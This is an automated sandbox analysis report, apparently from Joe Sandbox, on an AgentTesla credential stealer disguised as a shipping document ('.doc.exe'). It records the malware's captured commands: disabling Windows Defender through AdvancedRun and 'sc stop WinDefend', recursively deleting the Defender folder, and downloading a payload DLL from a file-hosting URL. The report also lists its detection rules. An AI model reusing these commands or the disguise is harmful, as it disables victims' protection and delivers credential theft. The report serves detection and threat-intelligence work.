Windows Analysis Report VESSEL PARTICULARS - NYK LINE.doc.exe

Overview

General Information

Sample Name: VESSEL PARTICULARS - NYK LINE.doc.exe
Analysis ID: 492154
MD5: 93445df2c96362810e0395c5c867700e
SHA1: 645f936406b04fbfb737bbffb5678d5255c6ec34
SHA256: ecb4fe719a7fc1365d70ec9db8b3c74cb4bf8968324c25d3817fcc5628fae6fa
Tags: exe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Suspicious Double Extension
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Machine Learning detection for dropped file
Sigma detected: Powershell Used To Disable Windows Defender AV Security Monitoring
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to launch a program with higher privileges
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Sigma detected: PowerShell Script Run in AppData

Classification

Process Tree

  • System is w10x64
  • VESSEL PARTICULARS - NYK LINE.doc.exe (PID: 5204 cmdline: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' MD5: 93445DF2C96362810E0395C5C867700E)
    • powershell.exe (PID: 1688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5512 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 6200 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5296 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • AdvancedRun.exe (PID: 1308 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6276 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

            Unpacked PEs

            Source | Rule | Description | Author | Strings
            0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
            0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
            0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
            0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
            0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4110a88.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                      Sigma Overview

                      System Summary:

                      Sigma detected: Suspicious Double Extension
                      Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, CommandLine: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, CommandLine|base64offset|contains: <S %, Image: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, ProcessId: 6248
                      Sigma detected: Powershell Used To Disable Windows Defender AV Security Monitoring
                      Source: Process startedAuthor: ok @securonix invrep-de, oscd.community, frack113: Data: Command: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run, CommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run, CommandLine|base64offset|contains: E)^, Image: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run, ProcessId: 6200
                      Sigma detected: PowerShell Script Run in AppData
                      Source: Process startedAuthor: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run, CommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run, CommandLine|base64offset|contains: E)^, Image: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run, ProcessId: 1308
                      Sigma detected: Non Interactive PowerShell
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com, CommandLine|base64offset|contains: M-*'-, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com, ProcessId: 1688
                      Sigma detected: T1086 PowerShell Execution
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132773302471000253.1688.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      AV Detection:

                      Multi AV Scanner detection for submitted file
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, Virustotal: Detection: 59%
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, Metadefender: Detection: 31%
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, ReversingLabs: Detection: 85%
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, Virustotal: Detection: 59%
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, Metadefender: Detection: 31%
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, ReversingLabs: Detection: 85%
                      Machine Learning detection for sample
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, Joe Sandbox ML: detected
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, Joe Sandbox ML: detected
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: unknownHTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49746 version: TLS 1.2
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000013.00000000.459126690.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000014.00000002.472251440.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmp
                      Source: global trafficHTTP traffic detected: GET /download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.507420763.00000000084C2000.00000004.00000001.sdmpString found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.coml equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.507420763.00000000084C2000.00000004.00000001.sdmpString found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com equals www.twitter.com (Twitter)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeString found in binary or memory: Test-Connection www.facebook.com equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeString found in binary or memory: Test-Connection www.twitter.com equals www.twitter.com (Twitter)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: l Test-Connection www.facebook.com equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.501955003.0000000000BB2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000017.00000000.493939002.0000000000202000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000018.00000000.495329702.00000000000D2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000019.00000002.497049822.00000000000C2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001A.00000002.498216890.00000000002F2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001B.00000000.498857847.0000000000112000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001C.00000000.500015340.0000000000252000.00000002.00020000.sdmpString found in binary or memory: powershell=Test-Connection www.google.comATest-Connection www.facebook.com?Test-Connection www.twitter.com5System.Reflection.AssemblyLoad?SmartAssembly.Dictionaries.Algo equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.501955003.0000000000BB2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000017.00000000.493939002.0000000000202000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000018.00000000.495329702.00000000000D2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000019.00000002.497049822.00000000000C2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001A.00000002.498216890.00000000002F2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001B.00000000.498857847.0000000000112000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001C.00000000.500015340.0000000000252000.00000002.00020000.sdmpString found in binary or memory: powershell=Test-Connection www.google.comATest-Connection www.facebook.com?Test-Connection www.twitter.com5System.Reflection.AssemblyLoad?SmartAssembly.Dictionaries.Algo equals www.twitter.com (Twitter)
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: https://store2.gofile.io
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeString found in binary or memory: https://store2.gofile.io/download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownDNS traffic detected: queries for: www.google.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.502784542.000000000134B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_012C29F0
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_012C04C4
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_02CEC0E4
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_02CEE520
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_02CEE530
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIyybawggybiqbtxofebfdynt.dll" vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.501981683.0000000000BB8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQGvRlHZGzAmlopEnIbagoK.exe4 vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.502784542.000000000134B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000017.00000002.494829249.0000000000208000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000018.00000002.495891381.00000000000D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000019.00000000.496472615.00000000000C8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001A.00000002.498233586.00000000002F8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001B.00000000.498937988.0000000000118000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001C.00000002.500615281.0000000000258000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, File read: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe'
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VESSEL PARTICULARS - NYK LINE.doc.exe.log
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@35/20@49/2
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_01
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeMutant created: \Sessions\1\BaseNamedObjects\Thcyqfmzh
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe.0.dr, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
